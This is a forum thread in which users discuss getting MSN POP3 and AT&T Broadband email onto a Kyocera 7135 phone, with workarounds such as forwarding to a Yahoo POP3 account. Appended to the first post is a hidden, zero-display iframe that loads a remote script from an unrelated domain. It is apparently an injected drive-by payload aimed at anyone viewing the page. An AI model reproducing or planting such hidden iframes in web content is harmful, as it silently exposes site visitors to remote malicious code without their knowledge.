+ Reply to Thread

Email account options with MSN and broadband

I have two email addresses. My main one is an MSN POP3 account that I've had for years and I use as my main account. The trouble is, MSN POP3 has its own proprietery Secure Password Authentication protocols which means I cannot set it up in Eudora on the Kyocera, or on any other email app for that matter. MSN POP3 only works with Outlook or Outlook Express. My second email account comes with my AT&T Broadband connection. I tried setting that up on Eudora, without success. Maybe it's an email address that will only work for sending and receiving while logged on through their broadband system.

This means, sadly, I can't utilize the email features of the Kyocera 7135 ... unless I'm missing something. I'm assuming my only option is to open yet another POP3 email account with some company, and have yet another email address. Are there any workarounds I'm overlooking?

Thanks in advance for any suggestions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use att broadband as well, and am extremely disappointed that they do not allow me to check my E-Mail with my own e-mail package (Eudora on my lap top and the 7135) I do, however, have a workaround that can work for you as well (w/ both accounts).

I set up the att account to send a copy to my yahoo e-mail account, which is pop3. I then set the 7135 to get the e-mail from yahoo. I also set the yahoo account to send a text alert to my phone when e-mail is recieved.

So now. when someone sends and e-mail to my att account, my phone beeps to let me know, and I run Eudora on the 7135 to go get the e-mail.

Downside is the limit on the yahoo account. But since I use Yahoo as my home page, I just delete the e-mails every week or so.

Interesting. Thanks. I have a Yahoo account (I hardly ever use it). I assumed Yahho was like Hotmail and was web-based only. I'll have to go check it out. Thanks again.

I have an AT&T account that I able to set up and access my email using QNC. I called the Kyocera tech people and they were able to help me out. It works slick. A little slow on the download, but OK.

Is that a Broadband AT&T account, with the email address ending with @attbi.com?

Administrator
    perhaps I'm missin' somethin' but i use msn email also and i acces it thru gopherking. you can install gopherking on your shiny new 7135 and it will grab your email nicely... :UpThum

I did a search for Gopherking on here and Palm Gear and couldn't find it. Do you have MSN POP3 or the new MSN email which is basically web-based Hotmail. Thanks for letting me know.